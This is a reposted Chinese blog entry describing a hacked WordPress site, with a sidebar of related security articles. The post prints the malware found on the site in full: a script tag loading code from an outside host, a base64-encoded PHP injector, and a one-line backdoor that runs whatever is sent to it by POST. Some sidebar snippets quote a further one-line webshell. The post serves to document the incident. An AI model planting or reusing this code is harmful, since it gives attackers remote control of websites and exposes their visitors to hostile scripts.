Wordpress中毒中木马事件,被别人插入base64代码然后执行

最新推荐文章于 2021-08-20 10:53:20 发布
最新推荐文章于 2021-08-20 10:53:20 发布
阅读量545 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/kaixin110/archive/2010/08/06/1793633.html
版权

事件经过

所有的执行的文件里面都有

 

</style>
</head><script src=http://ftp.hbo.cz/_htpasswd/logo_small_long.php ></script>

 

<body class="home blog logged-in">
<div id="wrapper" class="hfeed">

 

模板内容 JS PHP都被修改


<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndHYyJykpe2Z1bmN0aW9uIHR2Migkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyWjBjQzVvWW04dVkzb3ZYMmgwY0dGemMzZGtMMnh2WjI5ZmMyMWhiR3hmYkc5dVp5NXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdHYyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHR2MjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHR2MjEpKWNhbGxfdXNlcl9mdW5jKCR0djIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd0djInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd0djInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdHYybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndHYyMicpKSE9J3R2MjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
Brooks  8:37:54
<?php  eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vsc2UgZGllKCc0MDQgTm90IEZvdW5kJyk7'));?>

gifimg.php 好多images文件夹下面有这个文件 多了一个这个文件

 

转载于:https://www.cnblogs.com/kaixin110/archive/2010/08/06/1793633.html

weixin_30608131
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WordPress木马,怎么办?
haliluya123a的博客
08-11 1216
WordPress无疑是最流行的CMS平台,但是正由于它成为越来越多人的选择,黑客也盯上了这个目标。因此如何确保Wordpress网页的安全是一项重要任务。本文将为大家介绍十个用来增强网页安全性的小插件。 Wp安全扫描 Wp-Security会扫描WordPress安装是否存在安全漏洞,并纠正用户的不当操作,如密码设置,文件许可,数据库安全,隐藏的版本和WordPress管理员保护/安全。
jmeter测试wordpress使用base64进行鉴权
weixin_30472035的博客
03-16 135
1、下载插件 对密码进行加密 2、安装插件 3、使用插件 4、使用base64对上面获取到的密码进行二次加密 echo -n "用户:密码" | base64 将以上命令键入linux命令行下方会出现编码后的密码。 输出结果: [root@VM_0_13_centos ~]# echo -n "admin:ygVV 31rD WO2r 5vk2...
电脑html外链加密,WordPress将网站内的外链转为内链并用base64加密跳转
weixin_39524703的博客
06-17 869
这种方法是采用https://maosiji.com/goto/base64加密码的形式进行外链跳转。分为两步:一、显示的时候,用正则以及wp的钩子修改外链形式为 /goto/base64。二、点击的时候,解密/base64部分,用template_redirect钩子和wp_redirect函数进行302跳转。在functions.php里添加:function wpmi_cn_convert_...
wordpress木马解决方法之实战记录
weixin_30649641的博客
02-07 360
今早正常打开网站后发现首页偏左后,第一反应该查看源码后发现,页面被挂上了JS马:<script>if(window.document)a=("v532b5".indexOf+Date).substr(0,6);aa=([1,2,3]['reverse']+[].reverse).substr(0,6);if(aa===a)f=[-30,-30,66,63,-7,1,61,72,60,7...
科迅免杀php一句话_PHP一句话木马Webshell变形免杀总结
weixin_39721370的博客
12-21 341
0×00 前言大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖.0×01 字符串上的舞蹈一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:@eval ($_POST[xxxxx]);很明显的eva...
怎么能防止网站被注入eval(base64_decode这种类型的木马
superobser的博客
11-28 3470
一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了 网站挂马是每个网站最头痛的问题,解决办法:1.在程序很容易找到挂马的代码,直接删除,或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉 听朋友说 Sine安全 不错 你可以去看看。 清马+修补漏洞=彻底解决 清马 1、找挂马的标签,比如有或<ifra
wordpress代码失效解决办法
09-29
WordPress内容管理系统,短代码(Shortcode)是一种方便快捷的方法,用于在文章或页面插入复杂的功能,如媒体播放器、联系表单或者自定义布局。然而,有时候你可能会遇到短代码失效的问题,即短代码没有按照...
WordPress评论禁止HTML代码显示的方法
09-28
WordPress,允许用户在评论输入HTML代码可能会带来安全风险,比如垃圾评论者利用HTML标签插入恶意链接或脚本。为了防止这种情况,我们可以采取措施禁止评论的HTML代码显示。以下是一个详细的方法来实现这一...
WordPress代码文乱码的解决方法
09-29
WordPress的开发和维护过程,有时会遇到源代码文乱码的问题,这通常是由于编码格式不一致导致的。本文将详细解析这个问题,并提供解决方案。 首先,我们要了解编码的基础知识。在计算机系统文字符需要...
Wordpress上一篇与下一篇功能代码
09-28
为了在实际的WordPress主题模板使用这些函数,你通常会在文章内容的下方或者单独的导航区域插入这些代码。这有助于提升用户体验,让他们更容易地浏览网站上的其他相关文章。 总的来说,理解和灵活运用`previous_...
webshell 常见 Bypass waf 技巧总结
07-21 503
在渗透学习的过程,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷。 一篇好的文章,内容可以差,目录一定要 ~~ 吹牛 ~~ 真实。 一. webshell 免杀 0x0 php 内置函数加密 小例子: 在制作免杀大马之前,我们先来看看,一个带后门的免杀 ph...
Base64是什么? 一句话+一个例子就行了
天程十八的博客
09-17 1001
Base64是什么? 是这样一种操作 用64个可打印的字符来表示二进制数据 Base64的编码过程: 比如,转换前的二进制数据如下 10101101,10111010,01110110 ①将八二进制数据按六位一组进行分组,分组后将每一组补位成八位二进制如下:   00101011, 00011011 ,00101001 ,00110110 ②将转换好的八位二进制转成十进制如下   43 27 ...
CTF实战练习:文件上传漏洞+文件包含漏洞
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
病毒 | wordpress网站内容被篡改、自动跳转、变全英文的解决办法
weixin_30613343的博客
05-14 550
去年10月开始,网站经常有文章被莫名其妙的篡改,而且后面还经常出现跳转到色情网站的问题,让人烦不胜烦,困扰了好几个月,最后终于解决了。这里特次记录和总结下此次恼人的事件。 时间:2018年10月 问题: 1.编辑经常会在后台编辑发现文章被改成全英文的了,并且以前的文章也会被改成英文的。而我们的网站本身是文网站,也没有要做英文网站的打算。 2.打开网页后1,2秒后,网站会自动跳转到...
php解密 eval( base64_decode,base解密_php base64_decode解密
weixin_39777967的博客
03-10 2581
摘要 腾兴网为您分享:php base64_decode解密,银行帮,悟空单车,伪装定位,微商助手等软件知识,以及迷你盒子,固态硬盘优化软件,文华财经随身行,图片剪切工具,羊毛省钱,cygwin,极简名片,swf转avi,订货易,国移动办公系统,发财猫,大地魂酒,比赛平台,锤锤小矮人,声之形等软件it资讯,欢迎关注腾兴网。eval base64_decode解密的方法,在修改程序代码时,往往会碰...
谷歌广告已拒登:恶意软件或垃圾软件 如何解决
网站漏洞修复专家
04-02 2558
前几天,有一客户向我们SINE安全公司反映,网站在google上的推广已拒登,说什么网站存在恶意软件或垃圾软件,导致google广告无法上线,还发现网站从google搜索点击进去会直接跳转到其他网站上,直接输入网址不会跳转。客户自己尝试解决了很多天,解决不了,眼看着给公司带来了很大的损失,我们立即安排技术,对客户的网站安全进行全面的检测。 客户网站被google拒登的截图如下: 客户网站用...
Web安全-一句话木马
liuwei0376的专栏
08-20 4035
概述 在很多的渗透过程,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站上传一句话木马,然后你就可以在本地通过国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
wordpress漏洞扫描工具使用(wpscan实战)
热门推荐
天元喜羊羊的博客
08-07 1万+
http://www.2cto.com/Article/201212/178631.html BT5 WPSCAN 工具使用 首先看下Wpscan 工具目录 /pentest/web/wpscan 首先安装终端类型 apt-get install libcurl4-gnutls-dev gem install –user-install typhoeus gem insta
基于base64的简单加密/解密程序(不安全,因为base64是通用的)
kanpiaoxue的专栏
09-20 1614
我们在WEB程序经常会用到加密解密一些内容。下面给出一个简单的加密解密程序。 不安全,因为base64是通用的。但是对于简单的混淆是可以使用的。如果要高强度的加密,应该选择加密算法,如:DES 等。 该程序使用了Google的Guava框架。 https://code.google.com/p/guava-libraries/   import com.google.common....
WordPress构建Vue.js单页面应用实践
"本文将指导你如何在WordPress利用Vue.js构建单页面应用(SPA),主要涉及WordPress REST API和Vue.js的关键技术,包括单文件组件、事件处理、计算属性和生命周期等。此外,还会介绍如何与Axios库配合,与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值